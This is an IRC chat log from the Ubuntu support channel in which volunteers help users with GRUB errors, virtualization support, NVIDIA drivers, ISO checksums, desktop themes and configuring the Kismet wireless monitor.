Flomastern2diy: you got that right I was unable to load XP due to not having a sata driver on a floppy disk and win 7 refused to use my driver for the sata drive i had on a cd. ubuntu found and installed like a dream06:37
binarymegaysquirrel, try the ubuntu forums.  plnty of help there06:37
wise_crypt!info lubuntu-desktop ! Pr3nt1c306:37
ubottu'!' is not a valid distribution: hardy, hardy-backports, hardy-proposed, jaunty, jaunty-backports, jaunty-proposed, karmic, karmic-backports, karmic-proposed, kubuntu-backports, kubuntu-experimental, kubuntu-updates, lucid, lucid-backports, lucid-proposed, maverick, maverick-backports, maverick-proposed, medibuntu, partner, stable, testing, unstable06:37
Pr3nt1c3!info lubuntu-desktop ! Pr3nt1c306:38
nUboon2Agegaysquirrel: well I was using Xubuntu w/ that lower memory, but I think its kinda quirky and not as newbie friendly as Ubuntu., but06:38
Jordan_Uwise_crypt: Pr3nt1c3: It's '|' not '!'06:38
wise_crypt!info lubuntu-desktop | Pr3nt1c306:39
ubottuPr3nt1c3: lubuntu-desktop (source: lubuntu-meta): Lubuntu Desktop environment. In component multiverse, is optional. Version 0.13 (lucid), package size 3 kB, installed size 32 kB (Only available for i386 amd64 powerpc ia64 sparc lpia armel)06:39
nUboon2Agegaysquirrel: I tried Ubuntu Netbook Edition and it ran pretty well.  Also Peppermint is derived from Ubuntu and it ran pretty well.06:39
gaysquirrelokay welll thank you all for ur help ill look into all this and definitly frequent this chat more often06:39
n2diynUboon2Age: I set up two newbies with Xubuntu, and they love it. But they've never seen Ubuntu.06:39
gaysquirreland nUboon2Age i actually have an eeepc seashell running netbook remix06:39
gaysquirrelverrry fast06:39
Pr3nt1c3!info lubuntu-desktop | Pr3nt1c306:39
ubottuPr3nt1c3: lubuntu-desktop (source: lubuntu-meta): Lubuntu Desktop environment. In component multiverse, is optional. Version 0.13 (lucid), package size 3 kB, installed size 32 kB (Only available for i386 amd64 powerpc ia64 sparc lpia armel)06:39
gaysquirrelnUboon2Age, can i run netbook remix on my desktop by chance?06:40
Pr3nt1c3so.. uh... why did I type that?06:40
nUboon2Agegaysquirrel: what do you think of the eepc set up?06:40
anthonyhi to all my good community. i mean the best community in Linux... Ubuntu Rock's06:40
Flomastern2diy: I am very linux noobish but so far so good with ubuntu06:40
gaysquirrelnUboon2Age, absolutly amazing verry powerfull machine06:40
nUboon2Agegaysquirrel: yes, no prob on running Netbook Edition (its new name in 10.04)06:40
gaysquirrelnUboon2Age, so i CAN run netbook remix on a desktop with no problems?06:41
wise_cryptPr3nt1c3: use synaptic search lubuntu-desktop if you want to use lxde, any other question? please dont take poll06:41
binarymegaysquirrel, you can go into application manager and search for "netbook remix" and add the packages, then log out/in..... bingo!06:41
nUboon2Agegaysquirrel: sure.06:41
lighta_Can someone help me configure vsftpd mysql-pam virtual users ?06:41
n2diyFlomaster: it gets easier as you go, believe me, I've been doing this since 99.06:41
gaysquirrelwill it speed up the machine at all06:41
nUboon2Agegaysquirrel: your mileage may vary, but it did well on mine.06:41
gaysquirrellol by mileage u mean...06:42
DJ_HaMsTaYou guys are amazing.06:42
ubottuUsually, there is no single "best" application to perform a given task. It's up to you to choose, depending on your preferences, features you require, and other factors. Do NOT take polls in the channel. If you insist on getting people's opinions, ask BestBot in #ubuntu-bots.06:42
alabdGood day all , how to make Color scheme of 10.04 black and white ?06:42
DJ_HaMsTaYou guys are the best.06:42
spezticlegaysquirrel: think about what a netbook is. a small laptop usually with no cd drive. not neccisarily a low memory machine06:42
gaysquirrelvery true06:43
nUboon2Agegaysquirrel:  n2diy has had good experience w/ Xubuntu, so there's that option to  remember too.06:43
Flomasteryeah I an running it on a HTPC using XBMC  hooked up to my 61" tv , I can't figure out how to change my resolution though its at 1080 and thats fine for movies , but web browsing and file browsing = NO bueno06:43
gaysquirrelalright well its 1:41 am where im at and i have work at 5:30 am so i better get off to bed06:43
gaysquirrelill check in 2m06:43
Flomastersome thing funny with my Nvida driver or some thing06:43
gaysquirrelcheers goodnight06:43
Pr3nt1c3alabd, System_> pref's_> Appearance_> high contrast06:43
Pr3nt1c3or something similar06:43
binarymegaysquirrel, I install the standard version on my wifes HP2040 netbook and then converted to netbook edition.. it works well.06:43
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nUboon2Agen2diy: it did seem to do better when I upgraded to 10.04.  Then I had a hard drive failure and just upgraded memory and went for Ubuntu.06:44
anthonyhe guy's what can you say about the Ubuntu 10.10... what do you think...06:44
gaysquirrelbinaryme, whats the package name for netbook remix06:45
alabdPr3nt1c3: where is high contrast06:45
n2diynUboon2Age: roger that, I'm pretty much maxed out on ram here, 512m, I'm on 8.04, and thinking about upgrading, but my test box lost a hard drive, so until that is rebuilt, I'm sitting tight.06:46
nUboon2Agegaysquirrel: in 10.04 its not remix anymore, its netbook Edition.06:46
gaysquirrelso then whats the packagename06:46
binarymegaysquirrel, "ubuntu-netbook-remix"06:46
Pr3nt1c3umm... sys->pref->appearance should give you good options06:46
wise_cryptanthony: that is out of supporting topic chek #ubuntu-offtopic for that06:46
Pr3nt1c3there's 2+ 'high contrast' options06:46
gaysquirrelcool thanks man06:47
binarymegaysquirrel, it is being marketted as "Netbook Edition" but is still called "ubuntu-netbook-remix in package manger06:47
Pr3nt1c3tho from my exp about 1min ago... can't change colours06:47
JhonataOlá galera... EU gostaria de aprender melhor o ingles... sou do brasil... alguem poderia me ajudar no pvt ? apenas conversando comigo mesmo...06:48
JhonataHello everybody ... I would like to learn better English ... I'm from Brazil ... someone could help me in pvt? just talking to myself ...06:48
n2diy! bz06:49
* Pr3nt1c3 headslaps: 4hrs till eve installer re-dl06:49
n2diy! br06:49
ubottuEntre em #ubuntu-br usando /join #ubuntu-br para ajuda em português. Obrigado.06:49
Pr3nt1c3my braz-portuguese is terrible... haven't spoken braz in 5+ years06:50
Pr3nt1c3sorry pal06:50
alabdPr3nt1c3: can not see 'high contrast' option ?06:50
Fudgehi, i have ubuntu lucid on an imac, i think when i do a kernel upgrade the broadcom b54 drivers are lost, is that right?06:50
Fudgeb43 sorry06:50
Pr3nt1c3??? I can... what ubuntu you using, what desktop environ?06:50
Jhonatano... i desire learn speak fluent english06:50
nUboon2AgeJhonata: this is not the place to do that.  You could go to #ubuntu-offtopic perhaps.06:51
Jhonata[Fudge]: I believe that not06:52
n2diyJhonata: or just read along?06:52
JhonatanUboon2Age understand06:52
nUboon2Agen2diy: but one small thing about xubuntu that was really annoying and I think would be very tough on newbies was the crazy disappearing panels problem.  Is that better now?06:53
Jhonata[n2diy]: read and write and who knows maybe talk06:53
mneptok!offtopic | Jhonata06:54
ubottuJhonata: #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please use #ubuntu-offtopic for other topics. Thanks!06:54
n2diynUboon2Age: I never had that problem, but getting them set up on the bottom, where I like them, was a challenge.06:54
Pr3nt1c3alabd, any luck?06:54
n2diyJhonata: go for it man.06:54
mneptokJhonata: ask a support question. answer a support question. or watch quietly.06:54
Jhonatathank's very much06:54
nUboon2Agen2diy: and my weather applet worked correctly.  That's a plus (not working for me in Ubuntu) :-)06:54
alabdPr3nt1c3:  is high contrast a tab in appearance ?  9.04 gnome06:55
paulo_Every time I reboot my system I need to reinstall my Wireless USB driver through ndisgtk. When it will be fixed, anyone knows?06:56
fodder70high contrast is under themes06:56
Bibbgood morning06:56
nUboon2AgeFudge: did you go through the steps to install b43 previously?06:56
Pr3nt1c3alabd, to the best of my knowledge... since 8.x  high contrast has been an option under 'theme'... which is under sys->pref->appearance06:56
n2diyJhonata: the only problem I have, and it is minor, is my clock won't sync to ntp, but I noticed some errors in my logs about the ntp server wasn't found, so maybe it moved?06:56
binarymejhattara, perhaps you can try: http://www.learn-english-online.org/06:57
s73v3rI'm getting a Grub error 22 on a freshly installed Ubuntu 10.04 system. Can anyone help?06:58
nUboon2Agebinaryme: looks like their gone...06:58
=== Zaz is now known as Guest58926
wildbats73v3r, try reinstall grub206:59
ubottuGRUB2 is the default Ubuntu boot manager since Karmic. For more information and troubleshooting on GRUB2 please refer to https://wiki.ubuntu.com/Grub206:59
binarymenUboon2Age, ok, didn't notice he left already06:59
s73v3rfrom what I've seen, error 22 is mostly a Grub 1 error. Does it still exist on Grub 206:59
[Screamo]When i install proprietary drivers for my nvidia card, i cannot utilize my monitors full resolution, anyone know why?06:59
gbear14275ever since I switched from username and pw ssh to using keys I don't get the status message anymore... is there a way to re-enable that?06:59
nUboon2AgeFudge: were you the person who previously installed the b43 drivers?07:00
Ellementhas anyone here used rapache? and if so would they recommend it?07:00
FudgenUboon2Age  yeah and had done upgrades and lost wireless, ive just installed lts from an rc and reinstalled the driver, frehs install07:01
gbear14275it used to give me all sorts of great info... now it just says last login:07:01
s73v3rwere you suggesting doing grub-install?07:01
nUboon2AgeFudge: so did you record the steps you took to install?07:01
wildbats73v3r, see recovering grub from Live CD07:02
alabdPr3nt1c3: you mean in customize ?07:02
s73v3ri read the article07:02
FudgenUboon2Age  yeah in gnome installing the hardware dirvers, but if i want to do that i have to have it wired which means moving it07:02
nUboon2AgeFudge: I have a similar situation, but the first time I didn't record the steps and had to go through it all again.07:02
Jordan_Us73v3r: The problem is that grub2 isn't actually installed to the drive you're booted from.07:02
[Screamo]When i install proprietary drivers for my nvidia card, i cannot utilize my monitors full resolution, anyone know why?????07:02
Fudgei thought nUboon2Age  that the drivers would be pinned07:02
Jordan_Us73v3r: The "error 22" is coming from a left over grub legacy install07:02
Jordan_U!grub2 | s73v3r07:03
ubottus73v3r: GRUB2 is the default Ubuntu boot manager since Karmic. For more information and troubleshooting on GRUB2 please refer to https://wiki.ubuntu.com/Grub207:03
Pr3nt1c3?? hell no... which ubuntu you using?07:03
s73v3rthis is on a drive that should have been formatted on install. its not dual booting07:03
Pr3nt1c3I recently u/g to 10.04(lucid)07:03
Jordan_Us73v3r: Do you have more than one hard drive?07:03
Jordan_Us73v3r: Try changing the boot order to boot from the other drive07:04
Pr3nt1c3in System-> Pref -> Appearance.... there are a few themes as 'standard'.... there's a 'high contrast' option07:04
Pr3nt1c3but not B&W07:04
paranoidphreakhi everybody, i have the latest version of 64bit ubuntu installed on my system. i have also installed the latest virtualbox package (3.2.4) but i'm unable to run a 64bit OS inside the virtualbox. any thoughts on this07:04
s73v3ron the motherboard?07:04
Jordan_Uparanoidphreak: You probably don't have hardware vitualization support, a quick way to check is by running "kmv-ok"07:05
Jordan_Uparanoidphreak: Sorry, "kvm-ok"07:05
gbear14275anyone else here notice the change in the login message after moving to using ssh keys?07:05
n2diyPr3nt1c3: try one of them, and put all the color slider at min?07:05
alabdPr3nt1c3: no that is not good07:05
alabdhow to make Color scheme of 10.04 like 9.10 ? only Color scheme07:06
Pr3nt1c3well... I'm not a pro... but that's the best advice I can give you07:06
paranoidphreakJordan_U: it doesn't support it, f**k07:06
=== Pr3nt1c3 is now known as pr3nt1c3|afk
gbear14275anyone here able to tell me how to enable iommu?  or check if its already enabled?07:07
gbear14275it seems to be a prerequisite for PCI passthrough with virt-manager07:07
xtrishi, I have installed ubuntu 10.04.iso on my USB drive using universal usb installer. When i run the Ubuntu 'Installer boot menu' on my pc, the ubuntu boot screen appears, "I click Run Ubuntu from this USB" - it then shows: /casper/vmlinuz noprompt cdrom-detect/try-usb=true presistent file=/cdrom/pres/casper/vmlinuz etc...07:07
binarymeparanoidphreak, sometimes you need to adjust settings in you computer BIOS to enable VM extensions07:07
s73v3rdoh. Apparently the motherboard was set to boot from the wrong drive07:07
paranoidphreakJordan_U: so, there's no way i can do this without getting a new system that supports hardware virtualization?07:08
Jordan_Ualabd: System > Preferences > Appearance. Choose the Theme tab, then choose the "human" theme. That changes more than just the "color scheme" but I think it's still probably what you want.07:08
n2diygbear14275: sudo apt-get install iommu07:08
paranoidphreakbinaryme: i dont believe my system supports virtualization07:08
alabdJordan_U: no color scheme of 9.10 is good for black&white images07:09
binarymeparanoidphreak, then, unfortunately, you may have to stick with 32bit virtual machines07:09
Jordan_Uparanoidphreak: You can use "qemu-system-x86_64" for a 64 bit virtual machine, but it will be very slow.07:10
gbear14275n2diy: yeah, thats not a package07:11
binarymeparanoidphreak, how much memory (RAM) does your system have?07:11
n2diygbear14275: what is it then?07:11
paranoidphreakJordan_U, binaryme: thanks for the info; hate intel, i've seen alot of amd system's that supoort virtualization07:11
n2diy! iommu07:11
Jordan_Uparanoidphreak: Actually, check your BIOS settings before giving up entirely.07:12
paranoidphreakbinaryme: about 4 gigs07:12
gbear14275IOMMU is the AMD version of VT-d that intel put out from what I can tell.  Supposedly you have to enable it in BIOS but I'm finding people telling me to put it into my grub conf...  would love to just know how to figure out if its on already though07:12
gbear14275its a virtualization !iommu07:12
binarymeparanoidphreak, I'm running a Dell Laptop (intel) and it does support 64 bit07:12
wildbatparanoidphreak, know what cpu you are using?07:12
xtrisAutomatic boot in ...seconds is not working, why so?07:13
PipThe windows partition superblock got damaged, how to restore it ?07:13
n2diygbear1is it in the system boot bios?07:13
paranoidphreakJordan_U: i checked the info about virtualization long time ago regarding my system and it doesn't support it07:13
binarymeparanoidphreak, The benefits of 64 only really com into play if you have more tha 4Gig (per OS), so you are not going to get a lot of benefit on that PC anyway07:14
Jordan_Uxtris: "not working" in what way? What does happen?07:14
gbear14275n2diy: its not in the boot bios menu... but I'm not sure that means anything to be honest07:14
paranoidphreakwildbat: it's T430007:14
gbear14275n2diy: although I'm not sure... which is why I'm in here :(07:14
totonkahave to go, quit07:15
n2diygbear14275: I'm googling it now, looks like it lives o a virtual box?07:15
wildbatparanoidphreak, it DO support 64bit.~ are your MB having correct setting? ~ are you running 64bit OS?07:16
xtrisJordan_U: I installed Ubuntu 10.04 using my usb drive, when i launch the installer boot menu - it says Auto boot in 5 seconds -- it does nothing. I hit 'Run Ubuntu from this USB' -- nothing shows up07:16
gbear14275n2diy: this is more for KVM support than virtualbox but I'm sure it has relation there as well...  I think it goes to support hardware passthrough to VM's (which is why I'm interested in it)07:16
MefachedSo I installed 10.04, but all that I can hear from my headphones is an airy whine.07:16
MefachedLike the noise a TV makes when turned to the wrong channel07:16
paranoidphreakbinaryme: oh...i just want to run windows 7 in vm. currently, i'm running xp07:17
binarymeparanoidphreak, and you have a 64bit version of Win7 i gather?07:17
paranoidphreakwildbat: oh....  :), i'm currently running 64bit ubuntu07:18
BOyenwho are wine developer here in ubuntu07:18
paranoidphreakbinaryme: yeah, 64bit windows07:18
ikoniaBOyen: what is your question07:19
[Screamo]Can some please help me?07:19
paranoidphreakwildbat: what do you mean MB having correct settings?07:19
BOyenmy starcraft doesnt work in wine... and thats my biggest problem07:19
ikonia[Screamo]: what is the question07:19
binarymeparanoidphreak, ok, I see your problem..... It seems a little on to me that you PC doesn't support it if is capable of runnung a 64bit OS???07:20
binarymeparanoidphreak, on = odd07:20
BOyenyou the hardware of my PC?07:20
[Screamo]When i use prop. drivers for my nvidia card, i cant use my monitors highest reolution07:20
BOyenyou meant the hardware of my PC?07:20
BOyenrunning 64 bits?07:21
wildbatparanoidphreak, you can try vmware see if it help with 64-bit guest OS07:21
binarymeparanoidphreak, is it worth double checking your bios for the option...  I know it is often of by default.07:21
anon_how would i use special characters in linux? in windoze it's alt+ numbers to designate a character07:21
n2diygbear14275: sorry, don't see anything that helps, if you google Ubuntu iommu, maybe you will find what you need?07:21
[Screamo]ikonia any ideas?07:21
gbear14275n2diy: been doing it all night :-?07:21
ikonia[Screamo]: what are you calling the "proper" drivers ?07:21
paranoidphreakbinaryme: i went to this page: http://ark.intel.com/Product.aspx?id=37253 and it says it doesn't support VT-X07:21
binarymeparanoidphreak, there is a setting in virtualbox that relates to this too.07:21
BOyendo i need to format my ubuntu again?07:22
n2diygbear14275: :/07:22
[Screamo]ikonia, by prop. i ment proprietary07:22
gbear14275n2diy: thanks for looking though man!07:22
ikonia[Screamo]: from the hardware drivers menu ?07:22
[Screamo]ikonia yes07:22
ikonia[Screamo]: what card is it ? have you checked it's supportability ?07:22
binarymeparanoidphreak, ok, well, I guess that kinda kills the idea then?  Can you get hold a 32bit version of WIn7?07:22
n2diygbear14275: np, I was curious, having never heard of it.07:23
=== iflema__ is now known as iflema
gbear14275n2diy: I got there after reading this howto: http://www.linux-kvm.org/page/How_to_assign_devices_with_VT-d_in_KVM07:23
BOyenmy friend of mine play his starcraft on wine... in my pc i doesnt  play my starcraft using wine07:23
[Screamo]ikonia how would i find out what card is without looking at it?07:24
gbear14275n2diy: so was trying to figure out if I had VT-d support07:24
gbear14275am still trying to figure out if I do07:24
ikonia[Screamo]: lspci is a good start07:24
paranoidphreakwildbat: i'll give vmware a shot, thanks07:25
alabdany opinion07:25
n2diygbear14275: roger that, got to take a break, I'll take a look at it in a couple.07:25
[Screamo]01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev b2)07:26
spoonbVT-d usually needs to be enabled in bios, check there.07:26
gbear14275spoonb: Is there anyway to probe to see if its enabled already?07:27
paranoidphreakbinaryme: not @ the moment; i'm screwed. i guess i'll stick with xp for now and when i plan on getting a new system; i'm going to make sure it has virtualisation features. probably getting an amd system (more bang for the money)07:27
paranoidphreakbinaryme: thanks for your help anyways07:28
wildbatparanoidphreak, oh ~ a 64bit cpu but w/o VT-x  that's hurts.... hmmm what intel was thinking...., ~ you can't run 64bit guest then i get07:29
spoonbgbear14275: give me a sec to poke around on this comp which I have it enabled07:29
binarymeparanoidphreak, you're welcome.  sorry I couldn't be of more help.07:29
gbear14275spoonb: OOH thanks!07:30
paranoidphreakwildbat: yeah, i'm planning on moving to amd processors07:30
wildbatparanoidphreak, not mre AMD for me ~ i hate AMD ;p07:30
paranoidphreakwildbat: there cheaper07:30
=== titaniumbrella is now known as Carbonish
paranoidphreakwildbat: i tried amd and i found it suitable for me07:31
WormDrinkHi nick_07:31
WormDrinkyour in07:31
paranoidphreakwildbat: why do u hate amd?07:31
wildbatparanoidphreak, buggy and overheat issues07:32
mneptokparanoidphreak / wildbat: CPU holy wars are offtopic. please move the conversation.07:32
paranoidphreakwildbat: oh, i'll keep that in mind07:32
indusamd x3 is the greatest processor on earth :)07:33
binarymegbear14275, What do you get when you do "kvm-ok" in a console?07:33
Livingroomneed help with kismet. i dont know what to specify as the source type. using ubuntu 10.4....07:33
nick_hi guys, looking for help with RAID on Ubuntu server07:33
AAALivingroom  what is your wifi chip?07:33
Livingroomhmm, one sec07:33
Livingroomi know it's atheros based but i dont know the exact chipset #07:33
gbear14275$ kvm-ok07:33
gbear14275INFO: Your CPU supports KVM extensions07:33
gbear14275INFO: /dev/kvm exists07:33
gbear14275KVM acceleration can be used07:33
FloodBot2gbear14275: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.07:33
wildbatnick_, just ask the question may be07:34
gbear14275sorry FloodBot207:34
xtrisafter loading Universal USB Installer - 7-zip gave me a Diagnostic Message: It shows many "File is broken" -- Data error in '.disk/casper-uuid-generic'.'07:34
AAALivingroom  been a while since I used kismet, but there should be an option for the atheros driver in the comments07:34
spoonbcat /proc/cpuinfo should also have vme for virtual mode extensions for intel07:34
nUboon2Agealabd: did changing the theme to High Contrast Inverse work for you?07:35
gbear14275spoonb: running amd07:35
gbear14275spoonb: but i think I can look up the twin on amds side07:35
wildbatxtris, did check your iso against checksum?07:35
xtrisno, how do i do that?07:36
gbear14275spoonb: I have the vme flags... that mean vt-d is possible?07:36
binarymegbear14275, having a look at "man kvm-ok" may help...07:36
nick_ok, basically I installed Ubuntu Server 10.4, have 2 x 500GB drives on them 2 x 500MB partitions non-raid, for grub (booting from one of them), 2 x 4GB for swap (RAID 0), 2 x rest of the drives for / (RAID 0), the installation was successful, but after restart it went to BusyBox, grub menu didn't show up07:36
Sam_FisherHowdy Ya'll07:36
spoonbWell.. no.. it means kms is possible07:36
sikunI have a emachine em250 netbook, which is identical to the acer aspire d250, my question is i'm trying to find out what temp the cpu is running at, but in /proc/acpi/thermal_zone/THRM , temperature only reads at 27C and does not change07:37
spoonbKVM oops07:37
gbear14275spoonb: kms?07:37
Sam_FisherWhat softphone is the best? I am using X-lite but seems that it's 2 versions old compared to Windoze.07:37
nick_there is another 4 x 1.5TB raid 5 array which is for data only, on the same system07:37
wildbat!checksum | xtris07:37
ubottuxtris: To verify your Ubuntu ISO image (or other files for which an MD5 checksum is provided), see http://help.ubuntu.com/community/HowToMD5SUM or http://www.linuxquestions.org/linux/answers/LQ_ISO/Checking_the_md5sum_in_Windows07:37
gbear14275spoonb: ah yeah.  I'm already running VM's with kvm... my problem is figuring out pci passthrough which seems to be dependent on vt-d/IOMMU07:38
Sam_Fishersikun, have you tried it after boot from a cold system?07:38
spoonbYes it is and needs to be enable in the kernel.07:38
darthelp...when i type sudo nautilus i get this error...Nautilus could not create the required folder "/root/.config/nautilus"07:38
Livingroomaaa: cant find an atheros comment in the kismet.conf OR the kismet "README" what should i do07:38
sikunSam_Fisher, yeah i have even on a cold boot it is 27C right away07:38
spoonbDo you build your kernels or prepackaged?07:38
nick_booted from ubuntu live cd - it shows me the drives individually (Disk Manager) but under the RAID/LVM section I have only 1 array showing and it says "Not running, not enought components to start"07:38
gbear14275spoonb: thats actually my problem... how do I enable it in the kernel?07:38
somebody_my installer hangs at 79% does anyone know why?07:38
gbear14275spoonb: prepacakged :-/07:38
spoonbqbear14275: Let me see what the module would be real quick07:39
spoonbI'll have to look it up in the .config07:39
Sam_Fishersikun, are you worried it is to hot or just curious?07:39
gbear14275spoonb: I've read about alot of stuff happeinng in the grub .config but I don't know how to enable it07:39
darthelp...when i type sudo nautilus i get this error...Nautilus could not create the required folder "/root/.config/nautilus".....how can i solve this???07:39
prince_jammysdart: ''gksudo nautilus''07:40
wildbatnick_, the LIVE_CD don't ahve the drivers for RAID i think.07:40
gbear14275spoonb: this all talks to the error messages IOMMU states on startup: http://ubuntuforums.org/showpost.php?p=6855830&postcount=8807:40
AAALivingroom  lsmod | grep madwifi07:40
spoonbNot grub .config, but kernel config. I have to pass a boot arguement to enable it07:40
dartprince_jammys, i get that error on gksudo too07:40
LivingroomAAA: nothing07:40
spoonbI use intel IOMMU but I know where the AMD is too07:40
industrialHow do I add items in the list of windowmanagers in GDM? I compiled dwm in my homedir but can't select it.07:41
nick_wildbat, how can I check this07:41
sikunSam_Fisher, worried at times... it does get rather warm07:41
somebody_my installer hangs at 79% does anyone know why?07:41
spoonbHowever I dont always use it since it is buggy07:41
AAALivingroom  lsmod | grep ath07:41
Livingroomi do see something labeled "ATH" and "ATH5K" in the regular LSMOD,07:41
xtriswildbat: i checked the md5 sum, mine is incorrect07:42
Sam_Fisherdart, type sudo space and then na and then TAB to let it spell it correctly. I always spell it wrong.07:42
Livingroomyeah there's something labeled "ATH", AAA. ill try that07:42
wildbatnick_, you have to rescue/ reinstall grub from alternate CD, and drop to root shell to do so07:42
AAALivingroom  ok, do you have an ath0 as an ifconifg?07:42
Livingroomno, i have a wlan007:42
wildbatxtris, you have a bad Download then redownload and check again until it matches07:42
yiwantry sudo ifup07:42
dartSam_Fisher, hey is spelled it correctly...still07:43
Sam_Fishersikun, well then we need to figure this out! You need a graphical toolbar so you can keep an eye on it.07:43
xtriswildbat: alrighty, thx a lot :)07:43
Jordan_Uwildbat: nick_: Grub is working fine if you get to busybox, so re-installing grub won't help.07:43
spoonbgbear14275: Do you not have access to your BIOS? Even the kernel description says to check the bios for an option to enable it.07:43
Sam_Fisherdart, OK worth a try. Did GKsudo help?07:43
AAALivingroom  what is the wifi chip? look at $ lspci <-- see if you can tell what the wifi chip is, and paste it07:43
dartSam_Fisher, nope same problem07:43
spoonbThe kernel config option is CONFIG_AMD_IOMMU=y07:43
Livingroomaaa: just tried the line "source=wlan0,ath,wireless" and i tried it as source="ath,wlan0,wireless" and it didnt like either way07:44
gbear14275spoonb: how do I set that kernel config option?07:44
n2diygbear14275: if you followed the directons on that web page, I don't have a clue what else you can do?07:44
skarhi, cron isn't starting automatically on my machine with lucid for server amd64. anyone know a fix?07:44
spoonbFirst lets see if you already have it.07:44
Livingroomlsmod reports "atheros communications inc AR5001"07:44
Livingroomerr lspci07:44
spoonbDo you have a /usr/src/linux directory?07:44
wildbat!cn | roger__07:44
ubotturoger__: For Ubuntu help in Chinese 您可以访问中文频道: #ubuntu-cn 或者 #ubuntu-tw  或者 #ubuntu-hk07:44
Sam_Fishersikun, 19-year-old Isaac Holdsambeck was driving a Ford F-350 with four passengers when he swerved off the northbound lane of Hampton Cove Way.07:44
AAALivingroom  AR5001 ok. one sec07:45
nick_Jordan_U, yes, I am getting to busybox, but one more thing, I noticed that when it gets to busybox, all mounts fail, one of them being /dev/md1 which is supposedly the RAID0 array07:45
Sam_Fishersikun, oops my bad.07:45
Lance2whois Lance207:45
sikunSam_Fisher, what could cause it to not read the temp07:45
wildbatJordan_U, nick_ oh ! i miss the busybox part~07:45
Sam_Fishersikun, Do you have access to synaptic?07:45
sikunSam_Fisher, ha.. i was wondering07:45
sikunSam_Fisher, i will install it quick07:45
gbear14275spoonb: I have a /usr/src/ directory with kernel headers inside07:45
Livingroomaaa: ok07:45
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spoonbOk good!07:45
spoonbThe config file is a hidden file .config07:46
Sam_Fishersikun, Xsensors reads temp and voltage07:46
spoonbDoes it exist?07:46
wildbatroger__, this is a english channel ~ for chinese goto #ubuntu-cn07:46
gbear14275spoonb: no07:46
industrialHow do I add items in the list of windowmanagers in GDM? I compiled dwm in my homedir but can't select it.07:46
dartNautilus could not create the required folder "/root/.config/nautilus"....how to solve the error...this pops up when i type sudo nautilus07:46
Livingroomaaa: i got it fixed! i used "ath5k" instead of "ath" and it works!!!07:46
Livingroomaaa: thank you for the help!07:46
spoonbOk that wont work then.07:47
wildbatnick_, try maunally mount the root ?07:47
Sam_Fisherdart, have you tried rebooting X Cntrl Alt Backpsace? I have seen that error before I just can't place it exactly07:47
n2diyindustrial: is it in your sessions menu at the log in prompt?07:47
industrialthats whaty im saying07:48
spoonbFor reverence if you use make menuconfig in that directory you will get a ncurses based program to build a kernel07:48
industrialits not cause its not a package07:48
industrialits not in there how do i put it there07:48
spoonbYou can learn alot in there.07:48
dartSam_Fisher, i alrdy rebooted :(07:48
jaldharis there some problem with the latest flashplugin-nonfree update?  Now I can't use it in konqueror at all and firefox hangs every second or third time07:48
Sam_FisherWhat Softphone do you use? I have Gizmo5 and Google voice so free calling!07:48
sikunSam_Fisher, ok i just installed Xsensors, I have it open and right now it just shows a temp, and that is 26.8C07:48
spoonbUnfortunatly I dont know where the .config file is for those prebuilt kernels are.07:48
gbear14275spoonb: yeah I saw those commands in the howto... but i didn't know how to do that07:48
Sam_Fishersikun, man am I good or what!07:48
Sam_Fishersikun,  just kidding07:48
spoonbYou may not need too, but there are alot of descriptions in there to learn.07:49
Sam_FisherI guess now wait and see if it goes up or down?07:49
alabdnUboon2Age:  yes it works but not usefull for black and white paper07:49
Livingroomaaa: did you get that?07:49
gbear14275spoonb: I probably don't want to learn how to build my own kernels tonight I'm guessing07:49
Baribal_Hi. It turns out I make my swap partition too small. Is there a tool that can resize partitions without wiping them?07:49
AAALivingroom  yeah, I was just about to suggest that :) good work07:49
spoonbNo I wouldn't it taks some trail and error.07:49
Sam_FisherIs rebooting the same as Ctrl ALt Backspace?07:49
n2diyindustrial: have you tried running it in terminal?07:49
nUboon2Agealabd: and what was it that you were looking for?07:50
Livingroomaaa: it always bothers me when i have to ask for help :( thanks very much!07:50
Jordan_UBaribal_: Yes, reboot with the Ubuntu (or any other) LiveCD and use gparted.07:50
jaldharspoonb: l.config is in linux-kbuild-<kernel version> afaik07:50
WalterNok, I'm looking into building a new computer... which brings me to the classic question, ATI vs nvidia for driver support07:50
gbear14275spoonb: in some of the howto's they mention this: "add iommu=noaperture at the end of the line in /boot/grub/menu.lst starting with #defoptions. then do sudo update-grub and, finally reboot ..." we couldn't do something similar for that config change too could we?07:50
sikunSam_Fisher, the temp doesn't change though07:50
nick_wildbat, where grub gets its mount configuration from (e.g. fstab)07:50
Sam_FisherDual screen in a few minutes with Nvidia07:50
gbear14275anyone know where the config's for the default kernels are?07:50
industrialn2diy: I know it is installed and it will probably work (or not in which case ill recompile) but its not a UBUNTU package so it has no install scripts extra for GDM so it doesnt appear in GDM. How do I put it in the GDM list?07:50
WalterNis NVIDIA still that much better with their linux drivers?07:51
spoonbjaldhar awesome! But what subdirectory. I am not on a ubun currently07:51
Jordan_Ugbear14275: For grub2 change GRUB_CMDLINE_LINUX in /etc/default/grub and update-grub07:51
Sam_Fishersikun, what is the operation range for that puter? 27C seems ok to me07:51
nick_wildbat, so I should boot in busybox and try mount the root from there?07:51
n2diyindustrial: don't know, I'm not running Gnome, sorry.07:52
Sam_FisherSIP phone? Softphones? Linksys Pap2?07:52
spoonbWell qbear14275 yes you can but that is only if the option is available in the kernel. I suspect it is but I was trying to confirm it.07:52
wildbatnick_, yes see if you can mount it or what error you got07:52
industrialn2diy: derp, so I'm still at my original question07:52
wildbatnick_, grub don't mount fses07:52
spoonbI would look up and kernel cmd before passing them though07:53
alabdnUboon2Age:  looking for a black and white theme to be printed in a train hard book ,because book is black&white07:53
triaspiahey there, wondering if someone could help me, having a little trouble connecting to my wpa2-personal wireless connection, it wont see the network and doesnt connect if i put the details in as if it were a hidden network (only just installed ubuntu 10.04 and have next to no idea what im doing at this point)07:53
spoonbYou DO need to enable IOMMU with a cmd arg though07:53
nick_wildbat, will try now boot into busybox and mount the root07:53
Sam_Fishersikun, do you run Gnome? Computertemp applet logs changes07:53
gbear14275Jordan_U, spoonb:  thats the place to put it though?  And how would I check if it works after a reboot?07:54
spoonbIt is somewhat experimental and like I siad crashes me sometime07:54
Sam_Fishersikun, Mine is 56 C07:54
Livingroomaaa: now i get to learn to use kismet lol07:54
nUboon2Agealabd: you can get additional themes at http://www.gnome-look.org  and http://art.gnome.org and other places...07:54
spoonbYes kernel cmd arguments should be passed with grub you boatloader07:54
